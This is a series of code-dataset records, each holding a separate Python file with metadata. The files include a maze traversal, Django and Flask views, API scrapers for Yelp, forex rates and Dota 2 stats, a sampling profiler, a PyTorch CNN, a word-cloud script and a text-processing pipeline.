[]\n def push(self, value):\n self.stack.append(value)\n def pop(self):\n if self.size() > 0:\n return self.stack.pop()\n else:\n return None\n def size(self):\n return len(self.stack)\n\n# Helper funtion\ndef opposite_direction(direction):\n if direction == 'n':\n return 's'\n elif direction == 's':\n return 'n'\n elif direction == 'e':\n return 'w'\n elif direction == 'w':\n return 'e'\n else:\n return None\n\n# Load world\nworld = World()\n\nscript_dir = os.path.dirname(__file__)\n# You may uncomment the smaller graphs for development and testing purposes.\n# map_file = \"maps/test_line.txt\"\n# map_file = \"maps/test_cross.txt\"\n# map_file = \"maps/test_loop.txt\"\n# map_file = \"maps/test_loop_fork.txt\"\nmap_file = \"maps/main_maze.txt\"\n\n# Loads the map into a dictionary\nroom_graph=literal_eval(open(os.path.join(script_dir, map_file), \"r\").read())\nworld.load_graph(room_graph)\n\n# Print an ASCII map\nworld.print_rooms()\n\nplayer = Player(world.starting_room)\n\n# Fill this out with directions to walk\n# traversal_path = ['n', 'n']\ntraversal_path = []\n\n# Construct a traversal graph\ntraversal_graph = {}\n# Create a stack and push starting vertex\nstack = Stack()\nstack.push(player.current_room)\n# Create a set of traversed vertices\nvisited = set()\n# Create an array for moving to previous room\nreverse_path = []\n# While stack is not empty\nwhile stack.size() > 0:\n # exit out of the loop if all rooms are visited\n if len(visited) == len(room_graph):\n break\n\n # pop the first vertex\n current_room = stack.pop()\n\n # if current room is already visted, move back\n if current_room.id in visited:\n if len(reverse_path) > 0:\n move_back = reverse_path.pop()\n player.travel(move_back)\n traversal_path.append(move_back)\n # if not visited\n else:\n # push to stack\n stack.push(current_room)\n # Add to traversal graph\n if current_room.id not in traversal_graph:\n traversal_graph[current_room.id] = {}\n for direction in current_room.get_exits():\n traversal_graph[current_room.id][direction] = '?'\n\n # get random direction that has not been visited\n unvisited = []\n for key in traversal_graph[current_room.id]:\n if traversal_graph[current_room.id][key] == '?':\n unvisited.append(key)\n # if all of the directions are visited, append to visited set\n if len(unvisited) == 0:\n visited.add(current_room.id)\n continue\n\n # Move to random direction\n random.shuffle(unvisited)\n player.travel(unvisited[0])\n traversal_path.append(unvisited[0])\n # Update graph\n traversal_graph[current_room.id][unvisited[0]] = player.current_room.id\n if player.current_room.id not in traversal_graph:\n traversal_graph[player.current_room.id] = {}\n for direction in player.current_room.get_exits():\n traversal_graph[player.current_room.id][direction] = '?'\n traversal_graph[player.current_room.id][opposite_direction(unvisited[0])] = current_room.id\n stack.push(player.current_room)\n reverse_path.append(opposite_direction(unvisited[0]))\n\n# TRAVERSAL TEST\nvisited_rooms = set()\nplayer.current_room = world.starting_room\nvisited_rooms.add(player.current_room)\n\nfor move in traversal_path:\n player.travel(move)\n visited_rooms.add(player.current_room)\n\nif len(visited_rooms) == len(room_graph):\n print(f\"TESTS PASSED: {len(traversal_path)} moves, {len(visited_rooms)} rooms visited\")\nelse:\n print(\"TESTS FAILED: INCOMPLETE TRAVERSAL\")\n print(f\"{len(room_graph) - len(visited_rooms)} unvisited rooms\")\n\n\n\n#######\n# UNCOMMENT TO WALK AROUND\n#######\n# 
player.current_room.print_room_description(player)\n# while True:\n# cmds = input(\"-> \").lower().split(\" \")\n# if cmds[0] in [\"n\", \"s\", \"e\", \"w\"]:\n# player.travel(cmds[0], True)\n# elif cmds[0] == \"q\":\n# break\n# else:\n# print(\"I did not understand that command.\")\n\n","sub_path":"adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"190980279","text":"from django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.views.generic import ListView\nfrom django.db.models import Count\n\nfrom taggit.models import Tag\n\nfrom .models import Course\n\ndef course_list(request, tag_slug=None):\n object_list = Course.published.all()\n tag = None\n\n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n object_list = object_list.filter(tags__in=[tag])\n\n paginator = Paginator(object_list, 9) # 9 courses in each page\n page = request.GET.get('page')\n try:\n courses = paginator.page(page)\n except PageNotAnInteger:\n # if page is not an integer deliver the first page\n courses = paginator.page(1)\n except EmptyPage:\n # if page is out of range deliver last page of results\n courses = paginator.page(paginator.num_pages)\n return render(request, 'course/course/list.html', {'page': page, 'courses': courses, 'tag': tag})\n\nclass CourseListView(ListView):\n queryset = Course.published.all()\n context_object_name = 'courses'\n paginate_by = 9\n template_name = 'course/course/list.html'\n\ndef course_detail(request, course):\n course = get_object_or_404(Course, slug=course, status='published')\n course_videos = course.course_video.all()\n\n # list of similar courses\n course_tags_ids = course.tags.values_list('id', flat=True)\n similar_courses = Course.published.filter(tags__in=course_tags_ids).exclude(id=course.id)\n similar_courses = similar_courses.annotate(same_tags=Count('tags')).order_by('-same_tags', '-publish')[:4]\n\n return render(request, \n 'course/course/detail.html', \n {'course': course, \n 'course_videos': course_videos,\n 'similar_courses': similar_courses})\n\n","sub_path":"course/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"154025931","text":"#Yelp Call Function\ndef yelp_call(url_params):\n \n response = requests.get(url, headers=headers, params=url_params)\n return response.json()['businesses']\n\n#Data Parsing Function\ndef parse_results(list_of_data):\n # create a container to hold our parsed data\n biz_list = []\n # loop through our business and \n for business in list_of_data:\n # parse each individual business into a tuple\n try:\n biz_tuple = (business['name'],\n business['location']['address1'],\n business['rating'],\n business['price'],\n business['location']['zip_code'],\n business['transactions'],\n business['review_count'],\n business['categories']) \n # add each individual business tuple to our data container\n biz_list.append(biz_tuple)\n except:\n continue\n # return the container with all of the parsed results\n return biz_list\n\n#Saving as CSV Function\ndef df_save(csv_file_path, parsed_results):\n # your code to open the csv file, concat the current data, and save the data. 
\n business_df = pd.DataFrame(parsed_results, columns = ['Name', 'Location', 'Rating', 'Price', 'Zipcode', 'Transactions', 'Review Count', 'Categories'])\n business_df.to_csv(csv_file_path, mode = 'a')\n new_df = pd.read_csv(csv_file_path, delimiter = \",\")\n return new_df \n","sub_path":"Phase_1/ds-apis_json-main/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"355845619","text":"import time\nfrom flask_restful import reqparse, fields, Resource, marshal_with\n\n#请求格式定制\nfrom app.models import Cinema\n\nparser = reqparse.RequestParser()\nparser.add_argument('city', type=str, default='全部')\nparser.add_argument('district', type=str)\nparser.add_argument('sort', type=int, default=1) # 1按分数降序, -1 按分数升序\nparser.add_argument('limit', type=int)\n\ncinemas_fields = {\n 'id': fields.Integer,\n 'name': fields.String,\n 'city': fields.String,\n 'district': fields.String,\n 'address': fields.String,\n 'phone': fields.String,\n 'score': fields.Float,\n 'hallnum': fields.Integer,\n 'servicecharge': fields.Float,\n 'astrict': fields.Integer,\n 'flag': fields.Integer,\n}\n\nresult_fields = {\n 'status': fields.Integer(default=200),\n 'msg': fields.String,\n 'date': fields.String(default=str(time.time())),\n 'data': fields.List(fields.Nested(cinemas_fields), default='')\n}\n\n\n\nclass CinemaResource(Resource):\n @marshal_with(result_fields)\n def get(self):\n parse = parser.parse_args()\n city = parse.get('city')\n district = parse.get('district')\n sort = parse.get('sort')\n limit_n = parse.get('limit')\n\n cinemas = []\n if limit_n:\n cinemas =Cinema.query.limit(limit_n)\n if sort == 1: # 按分数降序\n cinemas = Cinema.query.order_by(-Cinema.score)\n elif sort == -1: # 按分数升序\n cinemas = Cinema.query.order_by(Cinema.score)\n\n if city=='全部':\n cinemas = Cinema.query.all()\n else:\n cinemas = Cinema.query.filter(Cinema.city==city)\n\n if district:\n cinemas =Cinema.query.filter(Cinema.district==district)\n\n\n responseData={\n 'msg':'影院获取成功',\n 'data':cinemas\n }\n\n return responseData\n","sub_path":"app/apis/CinemaApi.py","file_name":"CinemaApi.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"377647518","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup, find_packages\nimport re, ast\n\nwith open('requirements.txt') as f:\n\tinstall_requires = f.read().strip().split('\\n')\n\n# get version from __version__ variable in sensor_integration/__init__.py\n_version_re = re.compile(r'__version__\\s+=\\s+(.*)')\n\nwith open('sensor_integration/__init__.py', 'rb') as f:\n\tversion = str(ast.literal_eval(_version_re.search(\n\t\tf.read().decode('utf-8')).group(1)))\n\nsetup(\n\tname='sensor_integration',\n\tversion=version,\n\tdescription='Conector designed ti integrate sensors into ERPNext',\n\tauthor='Marius Ignat',\n\tauthor_email='marius.ignat13@gmail.com',\n\tpackages=find_packages(),\n\tzip_safe=False,\n\tinclude_package_data=True,\n\tinstall_requires=install_requires\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"116845811","text":"# -*- coding: utf-8 -*-\n\"\"\"\n profiling.sampling\n ~~~~~~~~~~~~~~~~~~\n\"\"\"\nfrom __future__ import absolute_import\nimport os\nimport signal\nimport threading\n\nfrom .profiler import 
Profiler\n\n\n__all__ = ['SamplingProfiler']\n\n\nclass SignalThread(threading.Thread):\n\n def __init__(self, signum=signal.SIGALRM, interval=0.1):\n threading.Thread.__init__(self)\n self.signum = signum\n self.interval = interval\n self.pid = os.getpid()\n self.stopper = threading.Event()\n self.daemon = True\n\n def send_signal(self):\n try:\n os.kill(self.pid, self.signum)\n except AttributeError:\n pass\n\n def run(self):\n while not self.stopper.wait(self.interval):\n self.send_signal()\n\n def stop(self):\n self.stopper.set()\n\n\nclass SamplingProfiler(Profiler):\n\n signum = signal.SIGALRM\n\n def handle_signal(self, signum, frame):\n self._profile(frame, 'call', None)\n self._profile(frame, 'return', None)\n\n def start(self):\n self.prev_handler = signal.signal(self.signum, self.handle_signal)\n self.signal_thread = SignalThread(self.signum)\n self.signal_thread.start()\n\n def stop(self):\n signal.signal(signal.SIGALRM, self.prev_handler)\n self.signal_thread.stop()\n","sub_path":"profiling/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"110343643","text":"#!/usr/bin/env python3\n#%%\n\nimport glob\nimport numpy as np\nfrom sklearn.neighbors import NearestNeighbors\n\nnp.random.seed(0)\n\ndef centroid(arr):\n center = np.mean(arr, axis=0) \n return center\n\n#%%\n\nlig_dir = '../data/train_lig/*'\npro_dir = '../data/train_pro/*'\noutput_dir = '../data/train_x/'\n\nnum_atoms_lig = 8\nnum_atoms_pro = 16\nnum_pairs = 2\n\nlig_files_path = glob.glob(lig_dir)\npro_files_path = glob.glob(pro_dir)\n\nlig_files_path.sort()\npro_files_path.sort()\n\nnbrs_lig = NearestNeighbors(n_neighbors=num_atoms_lig, algorithm='ball_tree')\nnbrs_pro = NearestNeighbors(n_neighbors=num_atoms_pro, algorithm='ball_tree')\n\nfor lig_file in lig_files_path:\n lig_arr = np.loadtxt(lig_file, delimiter=',', dtype=np.float64, ndmin=2)\n lig_num = lig_file[-15:-11]\n lig_index = int(lig_num) - 1\n# print('Ligand no.:', lig_num)\n# print('Ligand array shape: {}'.format(lig_arr.shape))\n\n # Calculate centroid\n lig_arr1 = np.copy(lig_arr[:,:-1])\n lig_centroid = centroid(lig_arr1)\n# print('Centroid:\\n {}'.format(lig_centroid))\n \n lig_atoms = lig_arr.shape[0]\n if lig_atoms < num_atoms_lig:\n # Pad with zeros at the bottom\n lig_arr_fixed = np.pad(lig_arr, ((0,num_atoms_lig - lig_atoms),(0,0)), 'constant')\n# print('Padded:\\n{}\\n'.format(lig_arr_fixed))\n elif lig_atoms > num_atoms_lig:\n # Truncate n number of atoms closest to centroid\n # Ordered with atom nearest to centroid on top\n nbrs_lig.fit(lig_arr1)\n knn = nbrs_lig.kneighbors(lig_centroid.reshape(1,-1), return_distance=False)\n lig_arr_fixed = lig_arr[knn.flatten()]\n# print('Truncated:\\n{}\\n'.format(lig_arr_fixed))\n else:\n lig_arr_fixed = lig_arr\n# print('No padding:\\n{}\\n'.format(lig_arr_fixed))\n \n rand_list = []\n for i in range(num_pairs):\n if i == 0:\n pro_file = pro_files_path[lig_index]\n rand_list.append(lig_index)\n else:\n while True:\n rand = np.random.randint(0,3000)\n if rand in rand_list:\n continue\n else:\n pro_file = pro_files_path[rand]\n rand_list.append(rand)\n break\n \n pro_arr = np.loadtxt(pro_file, delimiter=',', dtype=np.float64, ndmin=2)\n pro_arr1 = np.copy(pro_arr[:,:-1])\n pro_num = pro_file[-15:-11]\n# print('Protein no.:', pro_num)\n# print('Protein array shape: {}'.format(pro_arr.shape))\n \n pro_atoms = pro_arr.shape[0]\n if pro_atoms < num_atoms_pro:\n # Pad with 
zeros at the top\n        pro_arr_fixed = np.pad(pro_arr, ((num_atoms_pro - pro_atoms,0),(0,0)), 'constant')\n#        print('Padded: {}'.format(pro_arr_fixed.shape))\n    elif pro_atoms > num_atoms_pro:\n        # Select n number of protein atoms closest to ligand centroid\n        # Ordered with atom nearest to centroid on the bottom\n        nbrs_pro.fit(pro_arr1)\n        knn = nbrs_pro.kneighbors(lig_centroid.reshape(1,-1), return_distance=False)\n        pro_arr_fixed = pro_arr[knn.flatten()][::-1]\n#        print('Truncated: {}'.format(pro_arr_fixed.shape))\n    else:\n        pro_arr_fixed = pro_arr\n#        print('No padding: {}'.format(pro_arr_fixed.shape))\n\n    # Concatenate and save\n    pro_lig = np.concatenate((pro_arr_fixed, lig_arr_fixed), axis=0)\n    pro_lig_fname = output_dir + pro_num + '_' + lig_num\n    np.save(pro_lig_fname, pro_lig)\n    print(pro_lig_fname, pro_lig.shape)\n#    print(pro_lig, '\\\n')","sub_path":"e0267382_e0367779/code/train_preprocessing_binary.py","file_name":"train_preprocessing_binary.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"64990106","text":"year = 2108 # set some year\nmonth = 2 # set some month\nif month == 2:\n    # nested if-else: February needs a real leap-year test, not 'year == True'\n    if (year % 4 == 0 and year % 100 != 0) or year % 400 == 0:\n        nDays = 29\n    else:\n        nDays = 28\nelif (month == 4) or (month == 6) or (month == 9) or (month == 11):\n    nDays = 30\nelse:\n    nDays = 31\nprint(\"Number of days in the month:\", month)\nprint(\"nDays=\", nDays)","sub_path":"Lab2(11).py","file_name":"Lab2(11).py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"585042548","text":"# Objective: Display Forex exchange rates in a GUI.\n# USD to PKR Conversion tracker.\n\nfrom lxml import html\nimport requests\nfrom tkinter import * \n\n# Dollar Rate data fetch from: https://hamariweb.com/finance/forex/\npage = requests.get('https://hamariweb.com/finance/forex/')\ntree = html.fromstring(page.content)\n\nopen_market_buy = tree.xpath('//*[@id=\"dollar_rate_world\"]/tbody/tr[1]/td[3]/text()')\nopen_market_sell = tree.xpath('//*[@id=\"dollar_rate_world\"]/tbody/tr[1]/td[4]/text()')\ninter_bank_buy = tree.xpath('//*[@id=\"inter_bank_table\"]/tbody/tr[4]/td[3]/text()')\ninter_bank_sell = tree.xpath('//*[@id=\"inter_bank_table\"]/tbody/tr[4]/td[4]/text()')\n\n#date = tree.xpath('//*[@id=\"main-content\"]/div/div[1]/div/h1/small/text()')\n\n# Tkinter GUI\nroot = Tk()\nroot.title(\"Currency Tracker USD to PKR\")\n#root.geometry('{}x{}'.format(325, 225)) # Commented out to disable auto sizing\n\nl1 = Label(root, text = \"Currency Rates: USD to PKR\").grid(row=0, column = 1)\nl2 = Label(root, text = \"Inter Bank\").grid(row=1, column = 1)\nl3 = Label(root, text = \"Buying\").grid(row=2, column = 0)\nl4 = Label(root, text = \"Selling\").grid(row=2, column = 2)\nd1 = Label(root, text = inter_bank_buy).grid(row=3, column = 0) # DATA 1\nd2 = Label(root, text = inter_bank_sell).grid(row=3, column = 2) # DATA 2\nl5 = Label(root, text = \"Open Market\").grid(row=4, column = 1)\nl6 = Label(root, text = \"Buying\").grid(row=5, column = 0)\nl7 = Label(root, text = \"Selling\").grid(row=5, column = 2)\nd3 = Label(root, text = open_market_buy).grid(row=6, column = 0) # DATA 3\nd4 = Label(root, text = open_market_sell).grid(row=6, column = 2) # DATA 4\n\n# date_GUI = Label(root, text = date[0]).grid(row=7, column = 
1)\n\nroot.mainloop()","sub_path":"tracker_main.py","file_name":"tracker_main.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"511400177","text":"import torch\nimport torch.nn as nn\n\nclass Net(nn.Module):\n def __init__(self, num_classes=1):\n super().__init__()\n self.features = nn.Sequential(\n # suppose img size is 32*32*3\n # layer1\n nn.Conv2d(3, 6, 5, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2, stride=2),\n # layer2\n nn.Conv2d(6, 16, 5, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2, stride=2),\n )\n self.avgpool = nn.AdaptiveAvgPool2d((6, 6))\n self.classifier = nn.Sequential(\n # layer6\n nn.Dropout(),\n nn.Linear(6*6*16, 256),\n nn.ReLU(inplace=True),\n # layer7\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(inplace=True),\n # layer8\n nn.Linear(256, num_classes),\n )\n \n def forward(self, x):\n x = self.features(x)\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.classifier(x)\n return x\n","sub_path":"nets/simplenet.py","file_name":"simplenet.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"404408690","text":"from jd_comments import comment_file_path\r\nimport jieba\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nfrom wordcloud import WordCloud\r\n\r\n# 词云形状图片\r\nword_image = 'leaf.png'\r\n# 词云字体\r\nfont_path = 'C:\\Windows\\Fonts\\simsun.ttc'\r\n\r\ndef cut_word():\r\n with open(comment_file_path, encoding = 'utf-8') as file:\r\n comment_text = file.read()\r\n word_list = jieba.cut(comment_text, cut_all = True)\r\n wl = \" \".join(word_list)\r\n return wl\r\n\r\ndef creat_word_cloud():\r\n wc_mask = np.array(Image.open(word_image))\r\n wc = WordCloud(background_color = 'white', max_words = 1000,\r\n mask = wc_mask, scale = 4, max_font_size = 100,\r\n random_state = 42, font_path = font_path)\r\n\r\n wc.generate(cut_word())\r\n\r\n plt.imshow(wc, interpolation = 'bilinear')\r\n plt.axis('off')\r\n plt.figure()\r\n plt.show()\r\n\r\nif __name__ == \"__main__\":\r\n creat_word_cloud()","sub_path":"京东商品爬虫/show_data.py","file_name":"show_data.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"614308968","text":"#!/usr/bin/env python\n# test for service QuotationAccountDao\nimport random\nfrom xueqiao.quotation.account.thriftapi.dao.ttypes import *\nfrom xueqiao.quotation.account.thriftapi.dao.constants import *\nfrom xueqiao.quotation.account.thriftapi.dao.client.QuotationAccountDaoStub import *\nfrom xueqiao.quotation.account.thriftapi.ttypes import *\n\nstub=QuotationAccountDaoStub()\n#using like stub.xxxfunc(routeKey=random.randint(0, 100000), timeout=3000, args...)\n#testing...\n\nreq_option = ReqContractRegisterRuleOption()\npage_option= IndexedPageOption()\n\nreq_option.platformEnv = QuotationPlatformEnv.SIM\npage= stub.reqContractRegisterRule(routeKey=100, timeout= 2000, option=req_option, pageOption= page_option)\nprint(\"1: all\")\nprint(page)\n\nreq_option.commodityIds=[10512,10438]\n\npage= stub.reqContractRegisterRule(routeKey=100, timeout= 2000, option=req_option, pageOption= page_option)\nprint(\"2: commodity ids\")\nprint(page)\n\npage_option.needTotalCount = True\npage_option.pageIndex = 0\npage_option.pageSize = 10\n\npage= stub.reqContractRegisterRule(routeKey=100, timeout= 2000, option=req_option, 
\n","sub_path":"nets/simplenet.py","file_name":"simplenet.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"404408690","text":"from jd_comments import comment_file_path\r\nimport jieba\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nfrom wordcloud import WordCloud\r\n\r\n# word cloud mask image\r\nword_image = 'leaf.png'\r\n# word cloud font\r\nfont_path = r'C:\Windows\Fonts\simsun.ttc'\r\n\r\ndef cut_word():\r\n    with open(comment_file_path, encoding = 'utf-8') as file:\r\n        comment_text = file.read()\r\n    word_list = jieba.cut(comment_text, cut_all = True)\r\n    wl = \" \".join(word_list)\r\n    return wl\r\n\r\ndef create_word_cloud():\r\n    wc_mask = np.array(Image.open(word_image))\r\n    wc = WordCloud(background_color = 'white', max_words = 1000,\r\n                   mask = wc_mask, scale = 4, max_font_size = 100,\r\n                   random_state = 42, font_path = font_path)\r\n\r\n    wc.generate(cut_word())\r\n\r\n    plt.imshow(wc, interpolation = 'bilinear')\r\n    plt.axis('off')\r\n    plt.show()\r\n\r\nif __name__ == \"__main__\":\r\n    create_word_cloud()","sub_path":"京东商品爬虫/show_data.py","file_name":"show_data.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"614308968","text":"#!/usr/bin/env python\n# test for service QuotationAccountDao\nimport random\nfrom xueqiao.quotation.account.thriftapi.dao.ttypes import *\nfrom xueqiao.quotation.account.thriftapi.dao.constants import *\nfrom xueqiao.quotation.account.thriftapi.dao.client.QuotationAccountDaoStub import *\nfrom xueqiao.quotation.account.thriftapi.ttypes import *\n\nstub=QuotationAccountDaoStub()\n#using like stub.xxxfunc(routeKey=random.randint(0, 100000), timeout=3000, args...)\n#testing...\n\nreq_option = ReqContractRegisterRuleOption()\npage_option= IndexedPageOption()\n\nreq_option.platformEnv = QuotationPlatformEnv.SIM\npage= stub.reqContractRegisterRule(routeKey=100, timeout= 2000, option=req_option, pageOption= page_option)\nprint(\"1: all\")\nprint(page)\n\nreq_option.commodityIds=[10512,10438]\n\npage= stub.reqContractRegisterRule(routeKey=100, timeout= 2000, option=req_option, pageOption= page_option)\nprint(\"2: commodity ids\")\nprint(page)\n\npage_option.needTotalCount = True\npage_option.pageIndex = 0\npage_option.pageSize = 10\n\npage= stub.reqContractRegisterRule(routeKey=100, timeout= 2000, option=req_option, pageOption= page_option)\nprint(\"3: page option\")\nprint(page)\n","sub_path":"quotation_account_dao/py_clients/req_contract_register_rule.py","file_name":"req_contract_register_rule.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"615840540","text":"import requests\nimport json\nimport datetime\nimport codecs\nimport proxycheker\nimport configparser\n\n#get mmr function\ndef getmmr(playerid):\n    urlid = 'http://api.opendota.com/api/players/' + str(playerid)\n    reader = codecs.getreader(\"utf-8\")\n    r = requests.get(urlid)\n    parsed_string = json.loads(r.content)\n    # print(parsed_string)\n    mmr = {\"solo_mmr\": parsed_string['solo_competitive_rank'],\"group_mmr\": parsed_string['competitive_rank']}\n    #print(mmr)\n    playername = parsed_string['profile']['personaname']\n    return (mmr,playername)\n    #real_mmr = parsed_string['mmr_estimate']\n    # solo_mmr = parsed_string['solo_competitive_rank']\n\n#get match function\ndef getlastmatch(playerid,matchlimit):\n    urlid = 'http://api.opendota.com/api/players/'+str(playerid)+'/matches?limit='+str(matchlimit)\n    reader = codecs.getreader(\"utf-8\")\n    r = requests.get(urlid)\n    parsed_string = json.loads(r.content)\n\n    for i in range(matchlimit):\n        match_id = parsed_string[i]['match_id']\n        kda = {\"kills\": parsed_string[i]['kills'],\"deaths\": parsed_string[i]['deaths'],\"assists\": parsed_string[i]['assists']}\n        if kda[\"deaths\"] != 0:\n            kda_avg = round((kda[\"kills\"] + kda[\"assists\"]) / kda[\"deaths\"],2)\n        else:\n            kda_avg = round((kda[\"kills\"] + kda[\"assists\"]),2)\n        yield (kda_avg, match_id)
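\n\n# Added sketch (illustrative only, not in the original): iterating the generator\n# above for a player's last three matches; values depend on live OpenDota data.\n# for kda, match_id in getlastmatch(118912127, 3):\n#     print(match_id, kda)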
\n\n#get player hero stat\ndef getheroes(playerid,gamemode,proxyspisok):\n    if gamemode == 2:\n        filter_date = 180\n    elif gamemode == 1:\n        filter_date = 90\n    url = 'http://api.opendota.com/api/players/' + str(playerid) + '/heroes?game_mode=' + str(gamemode) + '&date=' + str(filter_date)\n\n    # proxy goes here; NOTE: assumed [ip, port] format, requests expects a 'proxies' mapping\n    r = requests.get(url, proxies={'http': 'http://{}:{}'.format(proxyspisok[0], proxyspisok[1])})\n    herostat_parsed = json.loads(r.content)\n\n    # load the mapping between hero names and ids\n    json_data = open('heroes.json').read()\n    datafromjson = json.loads(json_data)\n\n    # top heroes with the most games played\n    if gamemode == 2:\n        print('Top heroes in CM mode with win rate above 50%')\n    elif gamemode == 1:\n        print('Top heroes in AP mode with win rate above 50%')\n\n    print(\"--------------------\")\n    for i in herostat_parsed:\n        if i['games'] >=5 and (i['win']/(i['games']/100)) >= 50:\n            # for each hit, pair the hero name with its win-rate percentage\n            for g in datafromjson:\n                if int(g['value']) == int(i['hero_id']):\n                    last_p = str(i['last_played'])\n                    last = int(last_p[last_p.find('14'):])  # fragile: assumes the timestamp starts with '14'\n                    print(g['caption']+' - '+str(round((i['win']/(i['games']/100)),2))+ '%'+ ' - Wins: ' + str(i['win']) + ' Last played: ' + str(datetime.datetime.fromtimestamp(last)))\n                    break\n    # print('No luck')\n\n# hero_id = 105\n\n# # open the hero database\n# json_data = open('heroes.json').read()\n# datafromjson = json.loads(json_data)\n# # find the hero name matching the id\n# i = 0\n# while i <= 110:\n#     if datafromjson[i]['value'] == hero_id:\n#         print(datafromjson[i]['caption'])\n#         break\n#     i+=1\n\n# take proxies from the file and check them with proxycheker; keep the result in a list\n# on the first run, search for a working proxy\n# otherwise read the saved proxy back from the config\nconfig = configparser.ConfigParser()\nconfig.read('config.cfg')\nif int(config['FirstRun']['firstRun']) == 1:\n    config.set('FirstRun', 'FirstRun', '0')\n    file = open('psp.txt', 'r')\n    # the loop below can be written as the comprehension that follows\n    # proxyspisok = []\n    # for line in file:\n    #     proxyspisok.append(line.rstrip().split(':'))\n    proxyspisok = [line.rstrip().split(':') for line in file]\n    proxy = proxycheker.checkproxy(proxyspisok)\n    file.close()\n    config.set('Proxy', 'ip', proxy[0])\n    config.set('Proxy', 'port', proxy[1])\n    with open('config.cfg', 'w') as configfile:\n        config.write(configfile)\n\nelse:\n    config.read('config.cfg')\n    proxy = []\n    proxy.append(config.get('Proxy', 'ip'))\n    proxy.append(config.get('Proxy', 'port'))\n    with open('config.cfg', 'w') as configfile:\n        config.write(configfile)\n\nprint(proxy)\ngetheroes(118912127,2,proxy)","sub_path":"getDota2API.py","file_name":"getDota2API.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"280918938","text":"\"\"\"\nPipeline for text processing implementation\n\"\"\"\n\nfrom pathlib import Path\nfrom typing import List\nfrom pymorphy2 import MorphAnalyzer\nfrom pymystem3 import Mystem\nfrom article import Article\nfrom constants import ASSETS_PATH\n\n\nclass EmptyDirectoryError(Exception):\n    \"\"\"\n    Custom error\n    \"\"\"\n\n\nclass InconsistentDatasetError(Exception):\n    \"\"\"\n    Custom error\n    \"\"\"\n\n\nclass UnknownDatasetError(Exception):\n    \"\"\"\n    Custom error\n    \"\"\"\n\n\nclass MorphologicalToken:\n    \"\"\"\n    Stores language params for each processed token\n    \"\"\"\n    def __init__(self, original_word, normalized_form):\n        self.original_word = original_word\n        self.normalized_form = normalized_form\n        self.mystem_tags = ''\n        self.pymorphy_tags = ''\n\n    def __str__(self):\n        return f\"{self.normalized_form}<{self.mystem_tags}>({self.pymorphy_tags})\"\n\n    def public_method(self):\n        pass\n\n\nclass CorpusManager:\n    \"\"\"\n    Works with articles and stores them\n    \"\"\"\n    def __init__(self, path_to_raw_txt_data: str):\n        self.path_to_raw_txt_data = path_to_raw_txt_data\n        self._storage = {}\n        self._scan_dataset()\n\n    def _scan_dataset(self):\n        \"\"\"\n        Register each dataset entry\n        \"\"\"\n        path = Path(self.path_to_raw_txt_data)\n        for element in path.glob('*_raw.txt'):\n            index = int(element.parts[-1].split('_')[0])\n            self._storage[index] = Article(url=None, article_id=index)\n\n    def get_articles(self):\n        \"\"\"\n        Returns storage params\n        \"\"\"\n        return self._storage\n\n    def public_method(self):\n        pass\n\n\nclass TextProcessingPipeline:\n    \"\"\"\n    Process articles from corpus manager\n    \"\"\"\n    def __init__(self, corpus_manager: CorpusManager):\n        self.corpus_manager = corpus_manager\n        self.text = ''\n\n    def run(self):\n        \"\"\"\n        Runs pipeline process scenario\n        \"\"\"\n        for article in self.corpus_manager.get_articles().values():\n            self.text = article.get_raw_text()\n            tokens = self._process()\n            article.save_processed(' '.join(map(str, tokens)))\n\n    def _process(self) -> List[type(MorphologicalToken)]:\n        \"\"\"\n        Performs processing of each text\n        \"\"\"\n        mystem_analyser = Mystem()\n        pymorphy_analyser = MorphAnalyzer()\n        result = mystem_analyser.analyze(self.text)\n        morph_tokens = []\n        for element in result:\n            if element.get('analysis'):\n                morph_token = 